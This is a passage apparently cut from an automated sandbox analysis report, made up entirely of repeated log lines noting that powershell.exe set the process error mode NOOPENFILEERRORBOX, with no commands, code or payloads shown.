                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
